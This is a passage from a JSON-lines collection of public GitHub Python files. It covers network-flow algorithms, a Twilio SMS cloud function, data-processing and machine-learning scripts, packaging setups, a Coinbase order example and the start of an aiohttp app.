max_flow += Gf[j][s]\n return max_flow\n#################################\n## 卜东波 老师作业 Network Flow 第二题\n# For each data set, the first line has two number M and N, which means the matrix is M*N.\n# Next 2 line, the first line has M number, which indicate the sum of rows and the second line means the sum of columns.\n# 10 10\n# 5 5 7 7 6 3 5 7 7 3\n# 6 6 7 4 5 6 6 4 4 7\n## 数据预处理\nraw = '10 10\\n 5 5 7 7 6 3 5 7 7 3\\n 6 6 7 4 5 6 6 4 4 7' # raw = open('problem2.data').read()\nrow, col = [int(x) for x in raw.split('\\n')[0].split()]; print(row, col)\ngraph = np.zeros((row + col + 2, row + col + 2), dtype=np.int)\nprint(graph.shape) # (22, 22)\nfor idx, value in enumerate(raw.split('\\n')[1].split()): graph[0][idx + 1] = value\nfor idx, value in enumerate(raw.split('\\n')[2].split()): graph[row + idx + 1][-1] = value\n# 二分图之间全连接, 对角连接\ngraph[1:-1, 1:-1][:row, -col:] = 1\n# graph[1:-1, 1:-1][row:, :-col] = 1\npprint.pprint(graph)\n\n## 用 Flow Fulkerson 进行验证\ntmp = graph.copy()\nflow = Graph(tmp).FordFulkerson(0, row + col + 1)\nprint(flow) # 55\n\n## 用 Push Relabel 运行\ntmp = graph.copy()\nmax_flow = push_relabel(tmp, 0, row + col + 1)\npprint.pprint(tmp)\nmatrix = tmp[row+1:-1, 1:row+1].T # tmp 右上角为剩余网络, 左下角为反向网络, 所以取左下角的转置\nprint(matrix)\n# [[1 0 0 0 0 0 1 1 1 1]\n# [1 0 0 0 0 0 1 1 1 1]\n# [1 0 0 0 1 1 1 1 1 1]\n# [1 0 1 0 0 1 1 1 1 1]\n# [0 1 1 1 1 1 0 0 0 1]\n# [0 1 1 0 0 1 0 0 0 0]\n# [0 1 1 1 1 0 0 0 0 1]\n# [0 1 1 1 1 1 1 0 0 1]\n# [1 1 1 1 1 1 1 0 0 0]\n# [1 1 1 0 0 0 0 0 0 0]]\n\n##################################################################\n## 总结:\n# 1. 网络流关键使用 (V+2) * (V+2) 的矩阵来表示\n# 这样最后的结果:\n# 右上角小矩阵为残差网络/剩余网络, 用来找增广路\n# 左下角小矩阵为反向边, 记录了每条边现有的流量\n","repo_name":"HCShi/jShellscript","sub_path":"bin/template/src/jptalgorithm/l68_Ford-Fulkerson_Push-Relabel.py","file_name":"l68_Ford-Fulkerson_Push-Relabel.py","file_ext":"py","file_size_in_byte":8319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"11010071065","text":"#WAPT get even indexed word as key and odd indexed word as its value\ns='the quick brown fox jumps over the lazy the brown dog'\nl=s.split()\nd={}\nl1=[]\nfor i in range(0,len(l)-1,2):\n if l[i] not in d:\n d[l[i]]=l[i+1]\n else:\n l1.append(l[i])\nprint(d)\nprint(l1)\n","repo_name":"yogeshrakate/Dictionary","sub_path":"using dict.py","file_name":"using dict.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33230665608","text":"### IMPORTS\nimport os \n\nfrom twilio.rest import Client\nfrom google.cloud import firestore\nfrom flask import jsonify\n\n# Your Account Sid and Auth Token from twilio.com/console\n# DANGER! This is insecure. See http://twil.io/secure\n### CONSTANTS\n\n# US_SMS_CODE = '+1'\nPOKE_FROM_NUM = '+12063124797'\nACCOUNT_SID = os.environ['ACCOUNT_SID']\nAUTH_TOKEN = os.environ['AUTH_TOKEN']\n\ntemplate_body = 'Poke (Founders): Hi! We are reaching out to confirm you choosing the {} for {} points as your reward! Please reply with a YES or a NO, to confirm or deny.'\nDB = firestore.Client()\n\ndef get_user(uid):\n return DB.collection(u'Users').document(\n u'{}'.format(uid)).get().to_dict()\n\ndef set_user(uid, user_as_json):\n doc_ref = DB.collection(u'Users').document(uid)\n doc_ref.set(user_as_json)\n\ndef get_reward(rid):\n return DB.collection(u'Rewards').document(\n rid).get().to_dict()\n\ndef format_body(reward_name, reward_points):\n\treturn template_body.format(reward_name, reward_points)\n\ndef send_sms(body, from_num, to_num):\n\tclient = Client(ACCOUNT_SID, AUTH_TOKEN)\n\tmessage = client.messages.create(body=body, \n\t\tfrom_=from_num, to=to_num)\n\ndef test_entrypoint(uid, rid):\n\tuser_num = get_user(uid)['phone']\n\treward = get_reward(rid)\n\trname = reward['name']\n\trcost = reward['cost']\n\n\tbody = format_body(rname, rcost)\n\tsend_sms(body, POKE_FROM_NUM, user_num)\n\ndef entrypoint(request):\n\tuid = request.args['uid']\n\tuser_num = get_user(uid)['phone']\n\n\trid = request.args['rid']\n\treward = get_reward(rid)\n\trname = reward['name']\n\trcost = reward['cost']\n\n\tbody = format_body(rname, rcost)\n\tsend_sms(body, POKE_FROM_NUM, user_num)\n\treturn jsonify(status='success', code='send-reward-text')\n\n\"\"\"\nif __name__ == '__main__':\n\ttest_entrypoint('1076440981d44efb', '6eb3ec5989704013')\n\"\"\"\n\n\n","repo_name":"poke-saas/poke","sub_path":"scripts/cloud_functions/send_reward_text.py","file_name":"send_reward_text.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"8413416849","text":"# This source code is licensed under the license found in the\n# LICENSE file in the root directory of this source tree.\n# --------------------------------------------------------\n# compute O/E normalized matrix as extra channel.\n# --------------------------------------------------------\n\nimport numpy as np\n\nclass oe_normalize:\n def __init__(self, cutoff = 16) -> None:\n self.cutoff = cutoff\n def __call__(self, data):\n matrix = data['hic']\n n, _ = matrix.shape\n out = np.copy(matrix).astype(float)\n for d in range(n):\n p = np.arange(n-d)\n e = np.mean(matrix[p, p+d])\n if e>0:\n out[p, p+d] /= e\n # input matrix should be symmetric\n out[p+d, p] /= e\n \n out = np.minimum(out, self.cutoff)\n out = out / self.cutoff\n out = np.expand_dims(out, 0)\n return out\n","repo_name":"CHNFTQ/Capricorn","sub_path":"data_processing/oe_normalize.py","file_name":"oe_normalize.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"20497816829","text":"from pymongo import MongoClient\nfile = 'user_follow'\nreadPath = '/Users/alfonso/workplace/googleSync/yelp_dataset_sql/' + file + '.txt'\nwritePath = '/Users/alfonso/workplace/googleSync/yelp_dataset_sql/' + file + '_lv.txt'\n\ndbName = 'yelpdb'\n\nclient = MongoClient('mongodb://localhost:27017/')\ndb = client[dbName]\n\n\ndef read4txt():\n i = 0\n with open(readPath, 'r') as f:\n for sql in f:\n userid = sql.split('(')[2].split(',')[0].replace(\"'\", '')\n\n if db.userids.find_one({'uid': hash(userid)}) is not None:\n write2txt(sql)\n\n i += 1\n if i % 100000 == 0:\n print('now is ' + str(i))\n\n\ndef write2txt(sql: str):\n with open(writePath, 'a') as f:\n f.write(sql)\n\nread4txt()\n","repo_name":"SixingYan/yelp_dataset_process","sub_path":"sampler/ur_sampler.py","file_name":"ur_sampler.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16282906850","text":"import io\nimport os\nimport sys\nfrom shutil import rmtree\n\nfrom setuptools import setup, Command\n\n\ndef get_version(fname=\"flake8_bandit.py\"):\n with open(fname) as f:\n for line in f:\n if line.startswith(\"__version__\"):\n return eval(line.split(\"=\")[~0])\n\n\n# Package meta-data.\nNAME = \"flake8_bandit\"\nDESCRIPTION = \"Automated security testing with bandit and flake8.\"\nURL = \"https://github.com/tylerwince/flake8-bandit\"\nEMAIL = \"tyler@myndshft.com\"\n\nAUTHOR = \"Tyler Wince\"\n\n# What packages are required for this module to be executed?\nREQUIRED = [\"flake8\", \"bandit\"]\n\nhere = os.path.abspath(os.path.dirname(__file__))\n\nwith io.open(os.path.join(here, \"README.md\"), encoding=\"utf-8\") as f:\n long_description = \"\\n\" + f.read()\n\n\nclass UploadCommand(Command):\n \"\"\"Support setup.py upload.\"\"\"\n\n description = \"Build and publish the package.\"\n user_options = []\n\n @staticmethod\n def status(s):\n \"\"\"Print things in bold.\"\"\"\n print(\"\\033[1m{0}\\033[0m\".format(s))\n\n def initialize_options(self):\n pass\n\n def finalize_options(self):\n pass\n\n def run(self):\n try:\n self.status(\"Removing previous builds...\")\n rmtree(os.path.join(here, \"dist\"))\n except OSError:\n pass\n\n self.status(\"Building Source and Wheel (universal) distribution...\")\n os.system(\"{0} setup.py sdist bdist_wheel --universal\".format(\n sys.executable))\n\n self.status(\"Uploading the package to PyPi via Twine...\")\n os.system(\"twine upload dist/*\")\n\n sys.exit()\n\n\nsetup(\n name=NAME,\n version=get_version(),\n description=DESCRIPTION,\n long_description=long_description,\n author=AUTHOR,\n author_email=EMAIL,\n url=URL,\n py_modules=[\"flake8_bandit\"],\n install_requires=REQUIRED,\n include_package_data=True,\n license=\"MIT\",\n entry_points={\n \"flake8.extension\": [\n \"B=flake8_bandit:BanditTester\",\n ],\n },\n classifiers=[\n \"Framework :: Flake8\",\n \"Environment :: Console\",\n \"Intended Audience :: Developers\",\n \"License :: OSI Approved :: MIT License\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 2\",\n \"Programming Language :: Python :: 3\",\n \"Topic :: Security\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n \"Topic :: Software Development :: Quality Assurance\",\n ],\n cmdclass={\n \"upload\": UploadCommand,\n }, )\n","repo_name":"myii/flake8-bandit","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"} +{"seq_id":"18783697722","text":"\n\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, BatchNormalization\nfrom sklearn.metrics import accuracy_score\nfrom keras.utils import to_categorical\nimport numpy as np\n\n#붓꽃데이터 읽어들이기\ncolnames = ['SepalLength', 'SepalWidth', 'PetalLength', 'PetalWidth', 'Name'] \niris_data = pd.read_csv(\"./data/iris.csv\", names= colnames, encoding='utf-8')\n\n#붓꽃 데이터를 레이블과 입력 데이터로 뷴리하기\ny = iris_data.loc[:, \"Name\"]\nx = iris_data.loc[:, [\"SepalLength\", \"SepalWidth\", \"PetalLength\", \"PetalWidth\"]]\n\n# string one hot encoding\nfrom sklearn.preprocessing import LabelEncoder\nencoder = LabelEncoder()\nencoder.fit(y)\ny = encoder.transform(y)\n\ny = to_categorical(y).astype(int)\n\n#학습 전용과 테스트 전용 분리하기\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size = 0.2, train_size = 0.8, shuffle=True)\n\n#학습하기\nmodel = Sequential()\n\nmodel.add(Dense(1000, input_dim = 4))\nmodel.add(Dense(3, activation='softmax'))\n\nmodel.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'] )\nmodel.fit(x_train, y_train, epochs=50, batch_size=1)\n#평가하기\ny_pred = model.predict(x_test)\ny_pred = np.argmax(y_pred, axis=1)\nprint(y_pred)\ny_pred = encoder.inverse_transform(y_pred)\nprint(y_pred)\nacc = model.evaluate(x_test, y_test, batch_size=1)\nprint(\"정답률: \",acc[1] )\n","repo_name":"sangmain/ai_study","sub_path":"AI/ml/m05_iris_keras.py","file_name":"m05_iris_keras.py","file_ext":"py","file_size_in_byte":1461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"61945918","text":"# -*- coding: utf-8 -*-\nimport sys\nimport socket\nimport time\nimport traceback\n\n\ndef get_error():\n '''\n 1.使用sys.exc_info接受返回的数组包含异常的对象类型,异常的值以及一个traceback对象,对象中包含出错的行数、位置等数据\n 2.使用traceback模块提供的extract_tb函数来更加详细的解释traceback对象所包含的数据,数据包含异常文件名,异常的函数名,异常所在行,异常的报错点\n :return:\n '''\n\n # ip = socket.gethostbyname(socket.gethostname())\n times = time.strftime('%Y/%m/%d %H:%M:%S', time.localtime(time.time()))\n text = \"\"\n ex_type, ex_val, ex_stack = sys.exc_info()\n\n for filename, linenum, funcname, source in traceback.extract_tb(ex_stack):\n txt=\"{times} '{filename}', line{linenum}, in {funcname}\\n\\t{source}\\n\".format(times=times, filename=filename, linenum=linenum, source=source, funcname=funcname)\n text += txt\n\n if text:\n text += \"{ErrorType}:{Value}\\n\".format(ErrorType=ex_type, Value=ex_val)\n\n with open('logging', 'ab+') as f:\n f.write(text.encode('utf8'))\n f.close()\n return ''\n","repo_name":"crawlerwolf/toubiao","sub_path":"find_error.py","file_name":"find_error.py","file_ext":"py","file_size_in_byte":1167,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"13001176879","text":"import numpy as np\nimport subprocess\nimport os\nimport cv2\n\nclass Nnforge(object):\n\n \"\"\"This class is used to predict the class of input image.\n Internally, it uses nnForge, convolutional and fully-connected\n neural networks C++ library.\"\"\"\n\n # underlying network needs to be custom build to use special input subdirectory\n # in prediction\n def __init__(self,\n lock,\n isColor = True,\n bin_dir = \"/home/johannes/Lataukset/nnForge/bin\",\n input_directory=\"/home/johannes/nnforge_git/input_data/autoverkko/\",\n working_directory=\"/home/johannes/nnforge_git/working_data/autoverkko/\",\n ):\n\n self.bin_dir = bin_dir\n self.isColor = isColor\n self.binary = os.path.join(self.bin_dir, \"autoverkko\")\n self.i_dir = input_directory\n self.image_dir = os.path.join(input_directory, \"special\")\n self.w_dir = working_directory\n self.annotationfile = os.path.join(self.image_dir, \"annotation.csv\")\n self.lock = lock\n self.predictionfile = os.path.join(self.w_dir, \"prediction.csv\")\n self.classfile = os.path.join(self.w_dir, \"submission.csv\")\n\n #def fit(self, X, y):\n\n #X_all = np.concatenate([X, X_test])\n #y_all = y\n #y[y==0] = -1\n #y_all = np.concatenate([y_all, np.zeros(X_test.shape[0])])\n\n #dump_svmlight_file(X_all, y_all, self.inputfile, zero_based=False)\n\n\n #cmd = []\n #if self.C:\n #cmd = [\"svm_learn\",\n #\"-c\", str(self.C),\n #\"-t\", str(self.kernel),\n #\"-d\", \"2\",\n #\"-g\", \"1\",\n #\"-s\", \"1\",\n #\"-r\", \"1\",\n #self.inputfile,\n #self.modelfile]\n #else:\n #cmd = [\"svm_learn\",\n #\"-t\", str(self.kernel),\n #\"-d\", \"2\",\n #\"-g\", \"1\",\n #\"-s\", \"1\",\n #\"-r\", \"1\",\n #self.inputfile,\n #self.modelfile]\n\n #subprocess.call(cmd)\n #os.remove(self.inputfile)\n\n # returns probabilities\n # X is matrix of images, with dtype=uint8\n def predict_proba(self, X):\n lines = []\n with self.lock:\n self.__writeImages__(X)\n cmd_prep = [self.binary,\n \"prepare_testing_data\",\n \"--prediction_annotation\", os.path.basename(self.annotationfile),\n \"--testing_folder\", \"special\",\n \"--is_color\", \"true\" if self.isColor else \"false\",\n ]\n cmd_predict = [self.binary,\n \"test\"]\n subprocess.call(cmd_prep)\n subprocess.call(cmd_predict)\n lines = open(self.predictionfile, \"r\").readlines()\n predictions = [\",\".join(line.split(\",\")[1:]) for line in lines]\n predVek = [np.fromstring(line, sep=\",\") for line in predictions]\n predVek = np.vstack(predVek)\n\n return predVek\n\n # returns class labels\n def predict(self, X):\n lines = []\n with self.lock:\n self.__writeImages__(X)\n cmd_prep = [self.binary,\n \"prepare_testing_data\",\n \"--prediction_annotation\", os.path.basename(self.annotationfile),\n \"--testing_folder\", \"special\",\n \"--is_color\", \"true\" if self.isColor else \"false\",\n ]\n cmd_predict = [self.binary,\n \"test\"]\n subprocess.call(cmd_prep)\n subprocess.call(cmd_predict)\n lines = open(self.classfile, \"r\").readlines()\n predictions = [\",\".join(line.split(\",\")[1:]) for line in lines]\n predVek = [np.fromstring(line, dtype=np.int, sep=\",\") for line in predictions]\n predVek = np.vstack(predVek)\n\n return predVek\n\n def __writeImages__(self, X):\n f = open(self.annotationfile, \"w\")\n for i in range(X.shape[0]):\n imgName = os.path.join(self.image_dir, \"image{0}.png\".format(i))\n cv2.imwrite(imgName, X[i,...])\n f.write(imgName + \",0\\n\")\n f.close()\n\n","repo_name":"TeMaVa/Annotator","sub_path":"NnforgeWrapper.py","file_name":"NnforgeWrapper.py","file_ext":"py","file_size_in_byte":4219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42656963429","text":"# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n def recoverTree(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: void Do not return anything, modify root in-place instead.\n \"\"\"\n nodes, vals = [], []\n self.inorder(root, nodes, vals)\n vals.sort()\n for i, node in enumerate(nodes):\n node.val = vals[i]\n \n def inorder(self, root, nodes, vals):\n if root is not None:\n self.inorder(root.left, nodes, vals)\n nodes.append(root)\n vals.append(root.val)\n self.inorder(root.right, nodes, vals)","repo_name":"maruichen2004/LeetCode","sub_path":"Recover_Binary_Search_Tree.py","file_name":"Recover_Binary_Search_Tree.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"23847426254","text":"from analyzer import Analyzer\nimport yaml\nimport sys\n\n\nif __name__ == '__main__':\n \"\"\"\n This tool is used by the ghidra plugin to find glitches. argv[1] needs to be the path to the yaml exported by the plugin\n \"\"\"\n # get the yaml_path from argv\n yaml_path = sys.argv[1]\n print(f\"loading yaml from {yaml_path}\\n\")\n # load the yaml file\n yaml_file = open(f\"{yaml_path}/export.yaml\", 'r')\n # convert the yaml into a dictionary.\n # unsafe load needs to be used since the yaml contains code that needs to be executed\n options = yaml.unsafe_load(yaml_file)\n\n # Hack to get custom functions working. This only works in __main__ but not in other functions\n if not options[\"findOptions\"][\"useCustomFindFunction\"]:\n # if a find address is used set it in options\n options[\"find\"] = int(options[\"findOptions\"][\"findAddress\"], 16)\n else:\n # if a custom find function is used load it using exec and store it in options\n custom_find = ()\n print(custom_find)\n exec(options[\"findOptions\"][\"customFindFunction\"])\n print(custom_find)\n options[\"find\"] = custom_find\n\n # create the analyzer object that is used to simulate the glitches\n analyzer = Analyzer(options)\n\n # actually search for glitches\n found = analyzer.glitch()\n\n # write the found glitches back to yaml\n output_file = open(f\"{yaml_path}/output.yaml\", \"w\")\n yaml.safe_dump(found, output_file)\n\n","repo_name":"nikals99/fault-injection-simulation","sub_path":"py_scripts/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"73188260890","text":"import os\nimport sys\nimport time\nfrom ccapi import EventHandler, SessionOptions, SessionConfigs, Session, Subscription, Request, Event, Message\n\n\nclass MyEventHandler(EventHandler):\n def __init__(self):\n super().__init__()\n\n def processEvent(self, event: Event, session: Session) -> bool:\n if event.getType() == Event.Type_SUBSCRIPTION_STATUS:\n print(f\"Received an event of type SUBSCRIPTION_STATUS:\\n{event.toStringPretty(2, 2)}\")\n message = event.getMessageList()[0]\n if message.getType() == Message.Type_SUBSCRIPTION_STARTED:\n request = Request(Request.Operation_CREATE_ORDER, \"coinbase\", \"BTC-USD\")\n request.appendParam(\n {\n \"SIDE\": \"BUY\",\n \"LIMIT_PRICE\": \"20000\",\n \"QUANTITY\": \"0.001\",\n }\n )\n session.sendRequest(request)\n elif event.getType() == Event.Type_SUBSCRIPTION_DATA:\n print(f\"Received an event of type SUBSCRIPTION_DATA:\\n{event.toStringPretty(2, 2)}\")\n return True # This line is needed.\n\n\nif __name__ == \"__main__\":\n if not os.environ.get(\"COINBASE_API_KEY\"):\n print(\"Please set environment variable COINBASE_API_KEY\", file=sys.stderr)\n sys.exit(1)\n if not os.environ.get(\"COINBASE_API_SECRET\"):\n print(\"Please set environment variable COINBASE_API_SECRET\", file=sys.stderr)\n sys.exit(1)\n if not os.environ.get(\"COINBASE_API_PASSPHRASE\"):\n print(\"Please set environment variable COINBASE_API_PASSPHRASE\", file=sys.stderr)\n sys.exit(1)\n eventHandler = MyEventHandler()\n option = SessionOptions()\n config = SessionConfigs()\n session = Session(option, config, eventHandler)\n subscription = Subscription(\"coinbase\", \"BTC-USD\", \"ORDER_UPDATE\")\n session.subscribe(subscription)\n time.sleep(10)\n session.stop()\n print(\"Bye\")\n","repo_name":"crypto-chassis/ccapi","sub_path":"binding/python/example/execution_management_simple_subscription/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","stars":465,"dataset":"github-code","pt":"32"} +{"seq_id":"74102746651","text":"# Faça um programa que leia a largura e a altura de uma parede em metros,\n# calcule a sua área e a quantidade de tinta necessária para pintá-la,\n# sabendo que cada litro de tinta pinta uma área de 2 metros quadrados.\n\nlargura = float(input('Qual a largura da parede? '))\naltura = float(input('Qual a altura da parede? '))\nàrea = altura * largura\n\nprint('Dada a largura {}, e a altura {}, têm-se {} m² de àrea'.format\n (largura, altura, àrea))\ntinta = àrea/2\nprint('Para pintar esta parede você precisará de {} L de tinta'.format(tinta))\n","repo_name":"luiz-D-silva/Guanabara_exerc-cios","sub_path":"011.Pintando a parede (calcúlo de àrea).py","file_name":"011.Pintando a parede (calcúlo de àrea).py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"32594674284","text":"from __future__ import annotations\n\nfrom prettyqt.qt import QtCore\n\n\nclass Property(QtCore.Property):\n \"\"\"Template class that enables automatic property bindings.\"\"\"\n\n def __init__(self, *args, **kwargs):\n self.doc = kwargs.get(\"doc\")\n super().__init__(*args, **kwargs)\n\n @classmethod\n def get_doc_dict(cls, klass: type):\n import inspect\n\n return {\n name: member.doc\n for name, member in inspect.getmembers(klass)\n if isinstance(member, cls) and hasattr(member, \"doc\")\n }\n\n\nif __name__ == \"__main__\":\n prop = Property(int)\n","repo_name":"phil65/PrettyQt","sub_path":"prettyqt/core/property.py","file_name":"property.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"32"} +{"seq_id":"26978537839","text":"from email.charset import Charset\nimport requests\nimport time\nfrom lxml import etree\nfrom urllib.parse import urljoin\n\nurl = input()\n\ndef url_response(url):\n headers = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36 Edg/101.0.1210.53'}\n time.sleep(5)\n try:\n response = requests.get(url,headers=headers)\n except :\n time.sleep(60)\n response = requests.get(url,headers=headers)\n response=response.text\n #response = response.encode('iso-8859-1')\n #response = response.decode('gbk').encode('utf8').decode('utf8')\n html=etree.HTML(response)\n return html\n\ndef url_a(html):\n xp = html.xpath('//a/@href')\n url = xp[22]\n return url\n\ndef url_url(a,url):\n return urljoin(url, a)\n\ndef url_title(html):\n title = html.xpath('//div/text()')\n title = title[16]\n return title\n\ndef url_essay(html):\n essay = html.xpath('//div[@id=\"content\"]/p/text()')\n return essay\n\nwhile True:\n xie_ru = open('text.txt','a')\n html = url_response(url)\n a = url_a(html)\n url = url_url(a,url)\n title = url_title(html)\n essay = url_essay(html)\n xie_ru.write((title + '\\n'))\n print(title)\n print(essay)\n print(url)\n for aaa in range(len(essay)):\n essayx = essay[aaa]\n try:\n xie_ru.write(essayx+ '\\n')\n except:\n pass\n del essay\n xie_ru.close()\n","repo_name":"youdianhuaier/python-crawler","sub_path":"python-crawler/python_crawler.py","file_name":"python_crawler.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25859218255","text":"from django.conf.urls import url\n\nfrom . import views\n\nfrom discussions.views import discussions, single_discuss\n\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'logout/$', views.user_logout, name='user_logout'),\n\n url(r'about_me/$', views.about_me, name='about_me'),\n\n url(r'articles/$', views.articles, name='articles'),\n url(r'articles/(?P[\\w-]+)/$',\n views.single_article, name='single_article'),\n\n url(r'tags/$', views.tag_list, name='tag_list'),\n url(r'tags/(?P[\\w-]+)/$',\n views.article_by_tag, name='article_by_tag'),\n\n url(r'tutorials/$', views.tutorials, name='tutorials'),\n\n url(r'discussions/$', discussions, name='discussions'),\n url(r'discussions/(?P[\\w-]+)/$',\n single_discuss, name='single_discuss'),\n]\n","repo_name":"khizirsiddiqui/dreamlandmks","sub_path":"main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6883853343","text":"import socket\nfrom message import AppMessage\n\n\nHEADER_SIZE = 4\n\ndef recv_bytes(soc: socket.socket, req_size):\n buf = bytearray()\n cnt = 0\n total_bytes_count = 0\n while len(buf) < req_size:\n received = soc.recv(req_size - total_bytes_count)\n if len(received) == 0:\n cnt += 1\n if cnt >= 10:\n raise Exception('received 0 for 10 times')\n buf.extend(received)\n total_bytes_count += len(received)\n return buf\n\ndef recv_body_size(soc: socket.socket):\n header_bytes = recv_bytes(soc, HEADER_SIZE)\n return bytes_to_int(header_bytes)\n\ndef recv_message(soc):\n body_size = recv_body_size(soc)\n body = recv_bytes(soc, body_size)\n msg = AppMessage.restore_message(body)\n print('Received:', msg)\n return msg\n\n\ndef bytes_to_int(_bytes):\n return int.from_bytes(_bytes, byteorder='big')\n\ndef int_to_bytes(num, byte_count):\n return num.to_bytes(byte_count, byteorder='big')\n\ndef send_bytes(soc, body):\n body_size = len(body)\n header_bytes = int_to_bytes(body_size, 4)\n message = bytearray(header_bytes + body)\n message_length = len(message)\n # res = soc.send(bytearray(header_bytes))\n # soc.send(body)\n # res = soc.send(bytearray(header_bytes))\n\n totalsent = 0\n while totalsent < message_length:\n sent = soc.send(message[totalsent:])\n if sent == 0:\n raise RuntimeError(\"socket connection broken\")\n totalsent = totalsent + sent\n\n\ndef send_message(soc, msg: AppMessage):\n print('Sent:', msg)\n send_bytes(soc, msg.to_bytes())\n","repo_name":"misebox/tcpgame","sub_path":"common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70129904732","text":"# -*- coding: UTF-8 -*-\n\"\"\"\n @Author : Frank.Ren\n @Project : standford_cs329p \n @Product : PyCharm\n @createTime : 2023/9/1 14:21 \n @Email : sc19lr@leeds.ac.uk\n @github : https://github.com/frankRenlf\n @Description : \n\"\"\"\n\nfrom selenium import webdriver\n\nif __name__ == \"__main__\":\n chrome_options = webdriver.Chromeoptions()\n chrome_options.headless = True\n\n chrome = webdriver.Chrome(chrome_options=chrome_options)\n\n url = 'https://www.zillow.com/stanford-ca/sold/'\n page = chrome.get(url)\n\n house_id_url = 'https://www.zillow.com/homedetails/19506780_zpid/'\n","repo_name":"frankRenlf/standford_cs329p","sub_path":"web_scraping.py","file_name":"web_scraping.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"14730577790","text":"# py2exe compilation file\r\n\r\nfrom distutils.core import setup\r\nimport py2exe\r\n\r\nimport sys; sys.argv.append('py2exe')\r\n\r\nMydata_files = [('LogoCampusNetDrop.png')]\r\npy2exe_options = dict(\r\n dll_excludes=[\"MSVCP90.dll\"], # Exclude msvcr71\r\n compressed=True, # Compress library.zip\r\n )\r\n\r\nsetup(name='CampusNetDrop',\r\n version='1.0',\r\n description='CampusNetDrop',\r\n author='Rasmus Jones',\r\n windows=[{\r\n \t\t\t\"script\": \"CampusNetDrop.py\",\r\n \t\t\t#'uac_info': \"requireAdministrator\",\r\n \t\t\t\"icon_resources\": [(1, \"icon.ico\")]\r\n \t\t\t}],\r\n data_files = Mydata_files,\r\n options={'py2exe': py2exe_options},\r\n )","repo_name":"Rassibassi/CampusNetDrop","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"9947911210","text":"class Solution:\n def mergeAlternately(self, word1: str, word2: str) -> str:\n merged = \"\"\n pointer1 = 0\n pointer2 = 0\n maximum = max(len(word1),len(word2))\n i = 0\n while i < maximum:\n if pointer1 < len(word1):\n merged+=word1[pointer1]\n pointer1 +=1\n if pointer2 < len(word2):\n merged+=word2[pointer2]\n pointer2 +=1\n i += 1\n return merged\n","repo_name":"Gizaw-Agodo/A2sV","sub_path":"community-leetcode/1768-merge-alternatively.py","file_name":"1768-merge-alternatively.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"12573593310","text":"from aiohttp import web\nfrom routes import setup_routes\nfrom external.postgres import PostgresEngine\nimport yaml\nimport pathlib\n\n\nasync def init_pg(app):\n database_config = app['config']['postgres']\n postgres = PostgresEngine()\n await postgres.setup({\n 'min_con': database_config['minsize'],\n 'max_con': database_config['maxsize'],\n 'name': database_config['database'],\n 'username': database_config['user'],\n 'password': database_config['password'],\n 'host': database_config['host'],\n 'port': database_config['port'],})\n app['db'] = postgres\n\n\ndef load_config(path):\n with open(path, \"r\") as ymlfile:\n cfg = yaml.load(ymlfile, Loader=yaml.FullLoader)\n return cfg\n\n\ndef init_app(config=None):\n app = web.Application()\n conf = load_config(str(pathlib.Path('.') / 'config' / 'default.yaml'))\n app['config'] = conf\n app.on_startup.append(init_pg)\n setup_routes(app)\n return app\n\n\ndef 